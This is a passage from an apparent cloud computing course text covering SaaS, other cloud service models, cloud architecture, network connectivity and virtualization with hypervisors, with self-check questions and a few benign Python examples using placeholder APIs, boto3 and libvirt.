of business services, including ERP, CRM, billing, sales and human resources applications.

2. Social media networks: Several social networking service providers have used SaaS as a method of assuring
their long-term survival because of the widespread usage of social networking sites by the general public.
Because the number of users on social networking sites is growing at a rapid rate, cloud computing is the ideal
solution for varying load.

3. Document management: Because most businesses rely heavily on electronic documents, most SaaS
companies have begun to provide services for creating, managing, and tracking them.

4. E-mail services: Many people use e-mail services these days, and growth in e-mail usage is hard to predict.
Most e-mail providers therefore started offering their services as SaaS services to deal with the unexpected
number of users and the demand on e-mail services.

Pros and Cons of SaaS

SaaS provides software applications that are used by a wide range of consumers and small organizations
because of the cost benefits they provide.

SaaS services give the following advantages in addition to cost savings:

1. No client-side installation: Client-side software installation is not required for SaaS services. Without any
installation, end users may receive services straight from the service provider's data centre. Consuming SaaS
services does not need the use of high-end hardware. It may be accessible by thin clients or any mobile device.

2. Cost savings: Because SaaS services are billed on a utility-based or pay-as-you-go basis, end customers must
pay only for what they have utilized. Most SaaS companies provide a variety of subscription options to suit the
needs of various consumers. Sometimes free SaaS services are provided to end users.

3. Less maintenance: The service provider is responsible for automating application updates, monitoring, and
other routine maintenance, so the user is not responsible for maintaining the software.

4. Ease of access: SaaS services can be accessed from any device that has access to the Internet. The use of
SaaS services is not limited to a particular set of devices, which makes them adaptable to all devices.

5. Dynamic scaling: On-premise software makes dynamic scalability harder since it requires extra hardware.
Because SaaS services make use of cloud elastic resources, they can manage any sudden spike in load without
disrupting the application's usual operation.

6. Disaster recovery: Every SaaS service is maintained with suitable backup and recovery techniques. A large
number of servers are used to store the replicas. The SaaS may be accessed from another server if the allocated
one fails. This solves the problem of single point of failure. It also ensures high availability of application.

7. Multi-tenancy: Multi-tenancy refers to sharing the same application among multiple users; it improves
resource use for providers and decreases cost for users.

Data security is the biggest problem with SaaS services. Almost every organization is concerned about the
safety of the data stored on the provider's datacenter.
Some of the problems with SaaS services include the following:

1. Security: Security is a big issue when transitioning to a SaaS application. Data leakage is possible
because the SaaS application is shared by many end users, and the data is kept in the service provider's
datacenter. An organization cannot simply entrust its sensitive and confidential data to a third-party
provider, so the end user must be careful when choosing a SaaS provider in order to avoid data loss.

2. Connectivity requirements: In order to use SaaS applications, users must have an Internet connection. If
the user's connection is slow or unavailable, the services cannot be used effectively; dependence on a
high-speed Internet connection is a major limitation of SaaS applications.

3. Loss of control: The end user has no control over the data since it is kept in a third-party off-premise location.

Examples of SaaS

 Google GSuite (Apps)
 Dropbox
 Salesforce
 Cisco WebEx
 GoToMeeting
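Because SaaS applications are consumed over the web rather than installed, client programs usually interact
with them through HTTP APIs. The sketch below fetches records from a hypothetical SaaS endpoint using the
Python requests library; the URL, token and response fields are placeholders for illustration only.

# A minimal sketch of consuming a SaaS offering through its web API.
import requests

API_URL = "https://api.example-saas.com/v1/contacts"  # placeholder endpoint
API_TOKEN = "YOUR_API_TOKEN"                           # placeholder credential

response = requests.get(
    API_URL,
    headers={"Authorization": f"Bearer {API_TOKEN}"},
    timeout=10,
)
response.raise_for_status()

# Assumed response shape: a JSON list of contact records.
for contact in response.json():
    print(contact["name"], contact["email"])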

Figure 2.4.1 illustrates the three types of cloud computing services that are offered to clients. It is
important to note that cloud service delivery is made up of three distinct components: infrastructure,
platform, and software. In IaaS, the end user is responsible for maintaining the development platform and
the applications that run on top of it, while the underlying hardware is maintained by the IaaS provider.
In PaaS, end users are responsible only for developing and deploying the application and its data. In SaaS,
the user has no control over infrastructure management, the development platform or the end-user application;
all maintenance is handled by the SaaS provider. The responsibilities of provider and user are indicated in
Figure 2.4.2.

Fig. 2.4.2 Service provider and User management responsibilities of SPI model
2.4.4 Other services
1. Network as a Service (NaaS): NaaS allows end users to make use of virtual network services provided by the
service provider. Like other cloud service models it follows a pay-per-use approach, and users access the
virtual network services through the Internet. On-premise organizations traditionally spend heavily on network
equipment to run their own networks in their own datacenters. NaaS instead turns networking into a utility by
providing virtual networks, virtual network interface cards, virtual switches, virtual routers and other
networking components in the cloud environment. Popular services provided under NaaS include VPNs,
bandwidth on demand, and virtualized mobile networks.

2. DEaaS (Desktop as a Service): It allows end customers to enjoy desktop virtualization service without having to
acquire and manage their own computing infrastructure. It is a pay-per-use model in which the provider handles data
storage, backup, security and updates on the back end. DEaaS services are easy to set up, secure, and provide a
better user experience across a wide range of devices.

3. STorage as a Service (STaaS): STaaS gives end users the opportunity to store data on the service provider's
storage services; users may then access their files from anywhere and at any time. The STaaS provider abstracts
virtual storage from the underlying physical storage. STaaS follows a utility-based cloud business model:
customers rent storage space from the STaaS provider and can access it from any location. STaaS also provides
a disaster recovery backup storage solution (see the sketch at the end of this section).

4. Database as a Service (DBaaS): This service allows end users to access databases without having to install
or manage them; installing and maintaining the databases is the responsibility of the service provider. End
consumers may use the services immediately and pay for them based on their usage. Database administration is
automated with DBaaS, and the database services may be accessed by end users through the service provider's
APIs or web interfaces, which makes the database management procedure much easier. Popular DBaaS offerings
include ScaleDB, SimpleDB, DynamoDB, MongoDB and the GAE datastore.

5. Data as a Service (DaaS): An on-demand service in which a cloud vendor gives users access to data over the
Internet. The data may consist of text, photos, audio, video and so on. DaaS is closely related to other
service models such as SaaS and STaaS, and it may simply be included in either of them to offer a composite
service. Geographical data services and financial data services are two areas where DaaS is widely employed.
Agility, cost efficiency, and data quality are some of the benefits of DaaS.

6. SECurity as a Service (SECaaS): It is a pay-per-use security service that allows the user to access the cloud
provider's security service. The service provider combines its security services for the benefit of end customers in
SECaaS. It provides a wide range of security-related functions, including authentication, virus and malware /
spyware protection, intrusion detection, and security event management. Infrastructure and applications within a
company or organization are often protected by SECaaS service providers. SECaaS services are provided by Cisco,
McAfee or Panda etc.

7. Identity as a Service (IDaaS): Identity as a Service means leveraging a third-party service provider's
authentication infrastructure on behalf of end customers. A company or business is the most common end user of
IDaaS. With IDaaS services, any company can easily maintain its workers' identities without incurring extra
costs. IDaaS generally includes directory services and single sign-on, along with integrated services such as
registration, authentication, risk and event monitoring, and identification and profile management.
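As a concrete example of the storage-oriented services above, the sketch below stores and later retrieves a
file using Amazon S3 through boto3, one possible STaaS offering. The bucket name and file paths are
placeholders, and valid credentials are assumed to be configured.

# A minimal sketch of STaaS usage: storing and retrieving an object.
import boto3

s3 = boto3.client("s3")
BUCKET = "example-staas-bucket"  # placeholder bucket name

# Store a local file in the provider's storage service.
s3.upload_file("report.pdf", BUCKET, "backups/report.pdf")

# Later, retrieve it from any location with Internet access.
s3.download_file(BUCKET, "backups/report.pdf", "report-restored.pdf")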

 Check Your Progress 1

1. List out the names of popular cloud computing service providers.


.……………………………………………………………………………
……………………………………………………………………………
…………………………………………………………………………..
2. Distinguish between public and private clouds.

……………………………………………………………………………
……………………………………………………………………………

2.5 CLOUD ARCHITECTURE

The cloud architecture is divided into four major levels based on their functionality. Below Fig. 2.5.1 is a
diagrammatic illustration of cloud computing architecture.

Fig. 2.5.1 Cloud Architecture

1. Client access Layer:


The client access layer is the top-most layer of the cloud architecture. The clients of the cloud belong to
this layer, and it is here that they begin their journey into cloud computing. A client may use any device
that supports basic web application functionality, including smart mobile or portable devices, whether thin or
thick. Thick devices are general-purpose computers or smart devices with sufficient computing power of their
own, whereas a thin device has very limited processing capacity and depends on other systems. A cloud
application is often accessed in the same manner as a web application, but its characteristics differ from
those of a web application. Thus, the client access layer is made up of many different types of client devices.

2. Internet connectivity layer:


This layer provides the Internet connectivity through which users access the cloud. The entire cloud structure
depends on the network connection over which clients access the services. A public cloud relies entirely on
the Internet: its location is not known to the user, but it may be accessed from across the world. A private
cloud exists within the organization's premises, so a local area network may provide the connection within the
organization. In both cases the cloud relies completely on the network connection, and users need at least a
minimum level of bandwidth to use the public or private cloud. Service-level agreements (SLAs) do not include
the Internet connection between the user and the cloud when considering QoS (Quality of Service), so this
layer is not covered by the SLAs.

3. Cloud service management Layer


This layer is made up of the technologies used to manage the cloud. The cloud management software running on
this layer is responsible for managing the service provider's resources: scheduling, provisioning, optimization
(such as consolidating server and storage workloads), and internal cloud governance. Activities in this layer
affect the SLAs agreed between clients and the cloud vendor, since this layer is governed by SLAs. An SLA
violation occurs when service is not delivered in a timely or consistent manner, and if an SLA is violated the
service provider is required to pay a penalty. Both private and public cloud services rely on these
service-level agreements. Popular public cloud vendors include Microsoft Azure and AWS; similarly, private
cloud platforms such as Eucalyptus and OpenStack are used to create and manage private clouds.

4. Layer of physical resources


The bottom layer is the actual hardware resources layer and it is the base or foundation layer of any cloud
architecture. The resources comprise compute, storage, database and network, which are the fundamental physical
computing resources that make up a cloud infrastructure. These physical resources are actually pooled from different
datacenters located at different locations to provide service to a large number of users. Service provider offers
compute systems as a service to host the applications of the user and also provides the software to manage the
application based on scalability of resources. Storage systems keep track of business information as well as data
created or processed by applications running on the computing systems.

Computing systems and storage systems are linked together through networks. A network, such as a local area
network (LAN), connects physical computing devices to one another, allowing applications running on the compute
systems to communicate, and also connects the compute systems to the storage systems so that the data on the storage
systems can be accessed. Because the cloud serves computing resources from several cloud datacenters, networks link
the scattered datacenters and allow them to function as a single giant datacenter. Networks also link various clouds
to one another, allowing them to share cloud resources and services (as in the hybrid cloud model).

2.6 LAYERS AND ANATOMY OF THE CLOUD

The hierarchical structure of a cloud is called cloud anatomy. Cloud anatomy differs from architecture: it does not
include the communication channel over which the services are delivered, whereas architecture completely describes the
communication technology on which the cloud operates. Cloud architecture is the hierarchical structure of technology
on which the cloud is defined and operates. Anatomy may therefore be considered a subset of cloud architecture.
Figure 2.6.1 represents the cloud anatomy structure, which serves as the foundation for the cloud.
Fig.2.6.1 Layers of Cloud Anatomy

The cloud is made up of five main elements:

1. Application: The topmost layer is the application layer. This layer may be used to execute any kind of software
application.

2. Platform: This layer exists below the application layer. It consists of the executable platforms that are provided
for the execution of developer applications.

3. Infrastructure: This layer lies below the platform layer. The infrastructure consists of virtualized computational
resources that are provided to the users and connect with other system components. It allows the users to manage both
applications and platforms, and to perform computations based on their requirements.

4. Virtualization: It is a vital technology that allows cloud computing to function. It is the process of abstracting
the actual physical hardware resources so that they are provided in a virtual manner. It changes the way the same
hardware resources are distributed, allowing them to be shared by multiple tenants independently.

5. Physical hardware: The bottom-most layer is the physical hardware layer. It consists of servers, network
components, databases and storage units.
2.7 NETWORK CONNECTIVITY IN CLOUD COMPUTING

The cloud resources, which include servers, storage, network bandwidth, and other computer equipment, are distributed
over numerous locations and linked via networks. When an application is submitted for execution in the cloud, the
necessary and appropriate resources are used to run the application, and these resources are connected through the
internet. Network performance will be a major factor in the success of many cloud computing applications. Because
cloud computing offers a variety of deployment choices, cloud deployment models and their accessible components are
examined below from a network connection viewpoint.

The following are the different types of network connectivity in cloud computing:

 Public Inter cloud Networking


Customers may connect to a public cloud over the internet, and some cloud providers can provide virtual private
networks (VPNs). Public cloud services raise security issues, which are in turn connected to performance. One possible
strategy to provide security is to encourage connection through encrypted tunnels, allowing data to be transferred
across secure internet pipelines. This adds extra connectivity overhead, and employing it will almost certainly
increase latency and have an influence on performance.

If we want to minimize latency without sacrificing security, we must choose an appropriate routing strategy that
decreases communication latency, for instance by decreasing the number of transit hops in the path from cloud provider
to consumer. Such a connection may be made available via the internet through a federation of connected providers
(Internet service providers, or ISPs).

 Private Inter Cloud Networking

In a private cloud, the cloud and network connectivity are within the organization's premises. The connectivity within
the private cloud is provided through an internet VPN or a VPN service. All services are accessed quickly through the
well-established pre-cloud infrastructure, so moving to a private cloud does not affect application access
performance.

 Public Intra cloud Networking


Public intra cloud networking is the network connectivity inside the public cloud model. The cloud resources are
geographically distributed over datacenters, and those resources are provided to end users via the internet only. The
user cannot access public cloud intra networks since they are internal to the service provider. Quality of Service
(QoS) is the primary factor considered for resources linked throughout the world. The majority of these performance
concerns and violations are addressed commercially in SLAs.

 Private Intra cloud Networking

Intra cloud networking is the most complex networking and connection challenge in cloud computing, and the most
challenging aspect of the private cloud is private intra cloud networking. The applications running in this
environment are linked through intra cloud connections. Intra networking connects the provider datacenters owned by an
organization. Intra cloud networking is used by all cloud computing systems to link users to the resource to which
their application has been assigned. Once the link to the resource is established, intra networking is used to serve
the application to multiple users based on a service-oriented architecture (SOA). If the SOA concept is followed,
traffic may flow between application components and between the application and the user. The performance of such
connections will therefore influence the overall performance of cloud computing.

Modern approaches should be used to assess cloud computing networks and connections. Globalization and changing
organizational needs, particularly those related to expanded internet use, demand greater adaptability in today's
corporate networks.
 Check Your Progress 2

1. How the cloud architecture differ from cloud anatomy?


……………………………………………………………………………
……………………………………………………………………………
…………………………………………………………………………..

2. Describe briefly about private cloud access networking?

.……………………………………………………………………………
……………………………………………………………………………
…………………………………………………………………………..

2.8 SUMMARY

We covered the three SPI cloud service types as well as the four cloud delivery models in this chapter. We also
looked at how much influence a consumer had over the various arrangements. After that, we looked at cloud
deployment and cloud service models from a variety of perspectives, leading to a discussion of how clouds arise and
how clouds are utilized. To begin, the deployment models are the foundation and must be understood before moving
on to other components of the cloud. The size, location, and complexity of these deployment models are all taken
into account.

In this unit, we looked at four different deployment models. Each deployment model was described, along with its
characteristics and applicability to various types of demands. Each deployment model is significant in its own right.
These deployment patterns are crucial, and they frequently have a significant influence on enterprises that rely on
the cloud. A wise deployment model decision always pays off in the long run, avoiding significant losses. As a
result, deployment models are given a lot of weight.

Before diving into the complexities of cloud computing, it is vital to understand a few key concepts, including one of
the most significant: cloud architecture. It has a basic structure with component dependencies indicated. Anatomy is
similar to architecture; however, it does not take dependencies into account as architecture does. The cloud network
connection, which is at the heart of the cloud concept, is also critical. The network is the foundation on which the
cloud is built.

2.9 SOLUTIONS/ANSWERS

 Check Your Progress 1


1. List out the names of popular cloud computing service providers

 Microsoft Azure
 Rackspace Cloud
 Amazon Web Services (AWS)
 Alibaba Cloud
 IBM Cloud
 SAP
 Google Cloud
 VMWare
 Oracle
 Salesforce
2. Distinguish between public and private clouds.

Public Cloud:
 Managed by the cloud service provider.
 Offers on-demand scalability.
 Multitenant architecture that supports users from different organizations.
 Services are hosted on shared servers.
 Establishes connection to users through the internet.
 Cost-effective compared to the private cloud.
 Suited for less confidential information.

Private Cloud:
 Managed by the organization's operational staff.
 Scalability is limited.
 Dedicated architecture that supports users from a single organization.
 Services are hosted on dedicated servers.
 Establishes connection to users through a private network within the organization.
 Costly compared to the public cloud.
 Suited for secured, confidential information.

 Check Your Progress 2

1. How the cloud architecture differ from cloud anatomy?

Cloud anatomy describes the layers of the cloud computing paradigm on the service provider side. Cloud anatomy and
cloud architecture are not the same; anatomy is considered a part of cloud architecture. Cloud architecture completely
specifies and explains the technology on which the cloud operates, whereas anatomy does not include the technology on
which it operates.

2. Describe briefly about private cloud access networking?

A virtual private network (VPN) establishes a secured private corporate network connection within the private cloud to
access the services. The technology and methodologies are local to the organization's network structure in the private
cloud. This cloud network might be an internet-based VPN or a service supplied by the network operator.

2.10 FURTHER READINGS

1. Cloud Computing: Principles and Paradigms, Rajkumar Buyya, James Broberg and Andrzej M.
Goscinski, Wiley, 2011.
2. Mastering Cloud Computing, Rajkumar Buyya, Christian Vecchiola, and Thamarai Selvi, Tata McGraw
Hill, 2013.
3. Essentials of cloud Computing: K. Chandrasekhran, CRC press, 2014.
Unit 3: Resource Virtualization

Structure

3.1 Introduction
3.2 Objective
3.3 Virtualization and Underlying Abstraction
3.3.1 Virtualizing Physical Computing Resources
3.4 Advantages of Virtualization
3.5 Machine or Server Level Virtualization
3.6 Exploring Hypervisor or Virtual Machine Monitor
3.6.1 Hypervisor Based Virtualization Approaches
(Full Virtualization, Para Virtualization, Hardware-Assisted Virtualization)
3.7 Network Level Virtualization
3.8 Storage Level Virtualization
3.9 Desktop Level Virtualization
3.10 Operating System-Level Virtualization
3.11 XenServer Vs VMware

3.1 INTRODUCTION

Cloud Computing has gained immense popularity due to the availability of scalable Infrastructure
as a Service, Platform as a Service, and Software as a Service offerings. It is a framework in which
different kinds of services related to networks, computing resources, storage, development
platforms, and applications are provisioned through the internet. The basics of cloud computing
were discussed in the previous units. In this unit, we will discuss the fundamentals of
virtualization, its advantages, and its underlying abstraction. It is to be noted
that virtualization is the fundamental technology that helps to create an abstraction layer that
hides the intricacy of the underlying hardware. The virtualization technique provides a secure and
isolated environment for any user application such that one running application does not affect
the execution of another application. Further, in this unit, we will learn about server-level
virtualization and explore different hypervisor-based virtualization approaches. We will also
discuss operating system-level virtualization, network virtualization, storage virtualization, and
desktop virtualization. Finally, a brief comparison will be done on hypervisors like XenServer
and VMware.

3.2 OBJECTIVE

After going through this unit you should be able to:


➔ describe virtualization and its advantage;
➔ understand the concept of machine or server-level virtualization;
➔ learn about the hypervisor-based virtualization approaches;
➔ understand the basics of the operating system, network, storage, and desktop
virtualization;
➔ compare among XenServer and VMware;

3.3 Virtualization and Underlying Abstraction


Virtualization is a key technology that creates an abstraction to hide the complexity of computing
infrastructure, storage, and networking. Though virtualization technology has been around for the
last 50 years, its popularity has increased with the advancement of cloud computing. In a cloud
environment virtualization allows maximum customization and control over hardware resources
and enables the utilization of hardware resources to their maximum capacity.

Virtualization allows the creation of an abstract layer over the available System hardware
elements like processor, storage, memory, and different customized computing environments.
The computing environment which is created is termed virtual as it simulates an environment
similar to a real computer with an operating system. The use of the virtual version of the
infrastructure is smooth as the user finds almost no difference in the experience when compared
to a real computing environment. One of the very good examples of virtualization is hardware
virtualization. In this kind of virtualization, customized virtual machines that work similarly to
the real computing systems are created. Software that runs on this virtual machine cannot directly
access the underlying hardware resources. For example, consider a computer system that runs the
Linux operating system and simultaneously hosts a virtual machine that runs the Windows operating
system. Here, the Windows operating system will only have access to the hardware that is allocated
to the virtual machine. Hardware virtualization plays an important role in provisioning the IaaS
service of cloud computing. Some of the other areas for which virtual environments are provided are
networking, storage, and desktops. The overall virtualization environment may be divided into three
layers: the host layer, the virtualization layer, and the guest layer. The host layer denotes the
physical hardware device on which the guest is maintained. The virtualization layer acts as the
middleware that creates a virtual environment, similar to a real computer environment, in which a
guest virtual application executes. The guest, which may be a virtual machine or any other virtual
application, always communicates through the virtualization layer. A diagrammatic representation of
the virtualization environment is shown in Figure 1.
Figure 1: Diagram showing the virtualization environment.

From the above discussion, it should be noted that in reality, the virtualization environment is a software
program, and hence virtualization technology has better control and flexibility over the underlying
environment. The capability of software to imitate a real computing environment has facilitated the
utilization of resources in an efficient way. In the last few years, virtualization technology has drastically
evolved and the current version of technology allows us to make use of the maximum benefit that
virtualization provides. In this respect some of the important characteristics of virtualization can be
discussed as follows:
➔ Advancement in Security: In reality, more than one guest virtual machine runs on a single host
machine, and on each virtual machine different virtual applications are executed. Further, it is
very important to run each virtual machine in isolation such that no two applications running on
different virtual machines interfere with each other. In this respect, virtual machine manager
(VMM) plays an important role by managing virtual machines efficiently and providing enough
security. The operations of the different virtual machines are observed by VMM and filtered
accordingly such that no unfavorable activity is permitted. Sometimes it becomes important to
hide some sensitive or important data of the host from other guest applications running on the
same system. This kind of functionality is automatically provided by the virtualization
environment.

Figure 2: Features provided by virtualization environment

➔ Managing of Execution: In addition to security, features like sharing, aggregation, emulation,
and isolation are also considered important features of virtualization. The explanation of
these features is as follows:
◆ Sharing: Virtualization technology allows the execution of more than one guest virtual
machine over a single host physical machine. Here, the same hardware resources are
being shared by all the guest virtual machines. Here sharing of existing hardware
resources and using individual physical machines to their optimum capacity help to
minimize the requirement of a number of servers and the power consumption.

◆ Aggregation: Virtualization technology allows the resources of different

independent host machines to be combined so that they appear to the guest as one virtual host.
Cluster management software is a very good example of this in distributed computing. Cloud
computing environments also make use of this feature.

◆ Emulation: Virtualization environment allows different guest applications to run on top


of the host physical machine. Here the underlying virtualized environment is a software
program and hence can be controlled more efficiently. Further, based on the requirement
of guest application or program the underlying environment can be adjusted or modified
for smooth execution.

◆ Isolation: Virtualization environment enables guest virtual machines to run in isolation


such that no virtual machine running on the same host physical machine interferes with
each other. The guest virtual application accesses the underlying resources through the
abstraction layer. The virtual machine manager monitors the operation of each guest
application and tries to prevent any vulnerable activity.

Virtualization technology is adopted by different areas of computing. Further, based on the requirements
and uses different virtualization techniques were developed and each technique has its own unique
characteristics. In this regard Figure 3. shows a detailed classification of virtualization techniques. We
will be discussing some of the techniques in detail in the later sections.
Figure 3: A classification of virtualization technique

Check your Progress 1


1) Explain the importance of virtualization in cloud computing?
………………………………………………………………………………………………
………………………………………………………………………………………………
………………………………………………………………………………………………

2) How security is achieved through virtualization?


………………………………………………………………………………………………
………………………………………………………………………………………………
………………………………………………………………………………………………
3) Emulation and isolation are important features of virtualization. Justify the statement.

………………………………………………………………………………………………
………………………………………………………………………………………………
………………………………………………………………………………………………

Figure 4: Diagram showing the traditional and virtual architecture

3.4 Advantages of Virtualization

As discussed earlier, virtualization creates an abstracted layer over the available hardware elements, such as the
processor, storage, and memory, allowing them to be dispersed over several virtual computers, also known as Virtual
Machines (VMs). The importance of virtualization was realized when IT industries were struggling with the limitation
of x86 servers, which could run only a single operating system and application at a time. Virtualization technology
paved the way forward for the IT industry by maximizing the utilization of individual servers and enabling them to
operate at their maximum capacity. In this regard, Figure 4 shows the difference between the traditional and virtual
architectures. Furthermore, comparing older virtualization techniques with the current ones shows that the older
techniques supported only a single CPU and were slow, whereas current virtualization techniques have improved
considerably, allowing virtual machines to execute server applications with performance comparable to bare-metal
computer systems.

In order to improve performance and to maximize the availability and reliability of the service, virtualization allows
virtual machines to move from one host machine to another; this is called virtual machine migration. The migration of
virtual machines is achievable because the underlying environment is virtual. Virtual machine migration can be
performed offline or live. In offline migration the guest virtual machine is temporarily stopped, the image of the
virtual machine's memory is copied to the destination host machine, and the virtual machine is then restarted there.
In live migration, an active virtual machine is moved from one host machine to another while it keeps running. It
should also be noted that virtual machines are typically migrated from one host machine to another when some kind of
load balancing is required. The type of migration is chosen based on the requirement: if downtime is permissible then
offline migration is preferred, otherwise live migration is preferred.
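For illustration only, the hedged sketch below uses the libvirt Python bindings (which can manage hypervisors such as KVM or Xen) to request a live migration of a running guest from one host to another; the host URIs and the virtual machine name are placeholders, and the exact flags available depend on the hypervisor in use.

```python
# Minimal sketch of live virtual machine migration using the libvirt
# Python bindings (pip install libvirt-python). Host URIs and the VM
# name below are placeholders.
import libvirt

SOURCE_URI = "qemu:///system"                      # current (source) host
DEST_URI = "qemu+ssh://destination-host/system"    # destination host

src_conn = libvirt.open(SOURCE_URI)
dest_conn = libvirt.open(DEST_URI)

domain = src_conn.lookupByName("web-server-vm")    # the running guest to move

# VIR_MIGRATE_LIVE keeps the guest running while its memory is copied;
# without it the guest would be paused, closer to an offline migration.
domain.migrate(dest_conn, libvirt.VIR_MIGRATE_LIVE, None, None, 0)

src_conn.close()
dest_conn.close()
```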
Virtualization allows for more efficient use of the underlying resources, resulting in a higher return on a
company's hardware investment. Some other advantages of virtualization can be summarized as follows:

➔ Reducing Power Need: Virtualization helps to run more than one operating system and
application on a single physical system. This reduces the number of servers required, and hence
the energy needed for running and cooling the physical machines.
➔ Lower Cost: Virtualization of hardware or software resources helps to maximize the utilization of
individual resources without compromising performance. Thus the extra investment in servers is
minimized by running more than one operating system and application on a single server. In
addition, the requirement for extra space is also reduced. In this way, virtualization technology
is helping IT industries to achieve maximum benefit at minimal cost.
➔ Better Availability: Virtualization technology helps overcome the problem of sudden downtime due
to hardware faults or human-induced faults; that is, virtualization provides a fault-tolerant
environment in which applications run seamlessly. Virtualization allows better control and
flexibility over the underlying environment when compared to a standalone system. Further, during
a fault or system maintenance, virtualization technology may use live migration techniques to
migrate virtual machines from one server to another. Any application or operating system crash
results in downtime and lowers user productivity. Administrators can therefore use virtualization
to run many redundant virtual computers that can readily handle this situation, whereas running
numerous redundant physical servers would be costly.
➔ Resource Efficiency: With virtualization, we may run numerous applications on a single server,
each in its own virtual machine with its own operating system, without sacrificing quality-of-
service attributes like reliability and availability. In this way, virtualization allows efficient
use of the underlying physical hardware.
➔ Easier Management: In software-defined virtual machines, it is much easier to implement any
new rule or policy, making it much easier to create or alter policies. This may be possible as
virtualization technology provides better control over the virtual environment.
➔ Faster Provisioning: The process of setting up hardware for each application is time-consuming,
requires more space, and costs more money. Further provisioning a virtual machine (VM) is
faster, cheaper, and efficient and can be managed smoothly. Thus virtualization technology may
help to create the required configured virtual machines in minimum time and may also be able to
scale up or scale down the required demands in minimum time. Here it should be noted that the
problem of scalability may also be handled efficiently by virtualization techniques.
➔ Efficient resource management: As discussed earlier, virtualization provides better control and
flexibility when compared to traditional architecture. Virtualization allows IT administrators to
create and allocate the virtual machine faster and live-migrate the virtual machine from one
server to another when required to increase the availability and reliability of the services. In order
to manage the virtualized environment, there are a number of virtualization management tools
available and the selection of appropriate tools may help to manage the virtual resources
efficiently. This tool may help to seamlessly migrate the virtual machine from one system to
another with zero downtime. This may be required when any server needs maintenance or is not
performing well.
➔ Single point Administration: The virtualized environment can be managed and monitored
through single virtualization management tools. However, the selection of efficient tools that
provide all the virtualization services properly is important. The appropriate tool will help to
create and provision virtual machines efficiently, balance the workload, manage the security of
the individual virtual machines, monitor the performance of the infrastructure, and guarantee to
maximize the utilization of the resources. Here all the different services can be administered by a
single tool.
3.5 Machine or Server Level Virtualization
Server virtualization is a technique to divide a physical server into various small virtual servers
and each of these independent virtual servers runs its own operating system. These virtual servers
are also called virtual machines and the process of creation of such virtual machines is achieved
by hypervisors like Microsoft Hyper-V, Citrix XenServer, Oracle VM, Red Hat’s Kernel-based
Virtual Machine, VMware vSphere. Here it should be noted that each virtual machine runs in
isolation on the same host physical machine and are unaware of any other virtual machine
running on the same host physical machine. To achieve this kind of functionality and
transparency different kinds of virtualization techniques are used. Further, there are different
types of server-level virtualization and they are as follows:

★ Hypervisor
★ Para Virtualization
★ Full Virtualization
★ Hardware-Assisted Virtualization
★ Kernel level Virtualization
★ System-Level or Operating System Virtualization

There are numerous advantages associated with server virtualization. Some of them are as
follows:

➔ In the case of server virtualization, each virtual machine may be restarted independently
without affecting the execution of other virtual machines running on the same host
physical machine.
➔ Server virtualization can partition a single physical server into many small virtual servers
and allows to utilize the hardware of the existing physical servers efficiently. Therefore
this minimizes the requirement of the extra physical servers and the initial investment
cost.
➔ As each small virtual server executes in isolation, if any virtual machine faces any kind of
issues then it will not affect the execution of other virtual machines running on the same
host physical machine.
In addition to these advantages, server virtualization also has some disadvantages, which are as
follows:

➔ If the host physical machine faces any problem and goes offline, then all the guest virtual
machines running on it will also be affected and go offline. This decreases the overall uptime of
the services or applications running on the individual virtual machines.
➔ Server virtualization allows a large number of virtual machines to run on the same physical
server, which may reduce the performance of the overall virtualized environment.
➔ Generally, server virtualization environments are not easy to set up and manage.

3.6 Hypervisor
The hypervisor can be seen as an emulator or simply a software layer that can efficiently
coordinate and run independent virtual machines over single physical hardware such that
each virtual machine has physical access to the resources it needs. It also ensures that
virtual machines have their own address space and execution on one virtual machine does
not conflict with the other virtual machine running on the same host physical machine.

Prior to the notion of the hypervisor, most computers could run only one operating system at
a time. This increased the reliability of the services and applications because the entire
system's hardware had to handle requests from a single operating system; the demerit, however,
is that the system could not utilize all of its computing capacity. Using a hypervisor, in
contrast, minimizes the need for space, energy, and maintenance.
hypervisor is also referred to as a virtual machine monitor and it helps to manage virtual
machines and their physical resource demands. It isolates virtual machines from one
another by logically provisioning and assigning computing power, memory, and storage.
Thus at any point of time if any virtual machine operation is vulnerable then it will not
affect the execution of another machine.
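To make this concrete, the hedged sketch below uses the libvirt Python bindings to ask a hypervisor for the virtual machines it is currently managing and the CPU and memory assigned to each one; it is an illustrative query only, and the connection URI is a placeholder rather than part of this unit's material.

```python
# Minimal sketch: querying a hypervisor (via libvirt) for the virtual
# machines it manages and the resources assigned to each one.
import libvirt

conn = libvirt.open("qemu:///system")   # connect to the local hypervisor

for dom in conn.listAllDomains():
    # info() returns: state, maximum memory (KiB), current memory (KiB),
    # number of virtual CPUs, and cumulative CPU time.
    state, max_mem_kib, mem_kib, vcpus, cpu_time = dom.info()
    print(f"VM: {dom.name():20s}  vCPUs: {vcpus}  "
          f"memory: {mem_kib // 1024} MiB  running: {dom.isActive() == 1}")

conn.close()
```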

Figure 5: Type 1 Hypervisor

There are basically two types of hypervisor: (i) Type 1 or bare metal, and (ii) Type 2 or
hosted. Hypervisors enable virtualization because they translate requests between the virtual
and physical resources. Type 1 hypervisors may also be embedded into the firmware at the same
layer as the motherboard's basic input/output system (BIOS), which helps the host operating
system access and use the virtualization software.

➔ Type 1 hypervisor: This is also termed as “Bare metal” hypervisor. This type of
hypervisor runs directly on the underlying physical resources. For running this
kind of hypervisor operating system is not required and it itself acts as a host
operating system. These kinds of hypervisors are most commonly used in virtual
server scenarios (See Figure 5.).
Pros: These types of hypervisors are highly effective as they can communicate
directly with the physical hardware. They also raise the level of security, as
there is nothing in between that could undermine it.

Cons: To administrate different VMs and manage the host hardware, a Type 1
hypervisor frequently requires a separate administration system.

Example:

Hyper-V hypervisor: Hyper-V is a Microsoft-designed hypervisor for


use on Windows systems. It is classified as a Type 1 hypervisor,
although it differs from other Type 1 hypervisors in that it does not
install on Windows and instead runs directly on the actual hardware as
the Host OS. As a result, it gains a performance edge.

Citrix XenServer: It is a commercial Type 1 Hypervisor that supports


Linux and Windows OS. It is based on the open-source Xen project and is now
generally known as Citrix Hypervisor. Xen supports virtualization technologies
such as Intel VT and AMD-V hardware-assisted environments. It also
supports paravirtualization, which alters the guest OS to work with the
hypervisor, improving performance.

ESXi hypervisor: VMware ESXi (Elastic Sky X Integrated) is a bare-


metal hypervisor mainly designed for server virtualization in the Data
Center. It can efficiently manage the group of Virtual machines.

VSphere hypervisor: Customers can download VMware ESXi for free


as part of the Free vSphere hypervisor, which also offers basic server
virtualization. Large businesses will purchase a more comprehensive
vSphere solution that includes a VMware vCenter Server license. vCenter Server is
a separate server used to manage the vSphere environment on physical hosts.

➔ Type 2 hypervisor: This hypervisor does not run directly on the underlying hardware. It
runs as a program on top of the computer's operating system and takes the help of that host
